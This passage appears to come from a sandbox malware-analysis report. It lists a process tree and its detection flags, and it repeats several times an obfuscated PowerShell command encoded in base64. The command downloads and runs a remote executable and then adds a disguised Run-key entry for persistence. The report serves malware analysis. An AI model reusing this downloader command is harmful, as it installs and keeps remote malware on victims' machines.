gBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwERShElL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1756
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c pOw^ERShE^lL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:1920
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwERShElL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:944
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c pOw^ERShE^lL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYA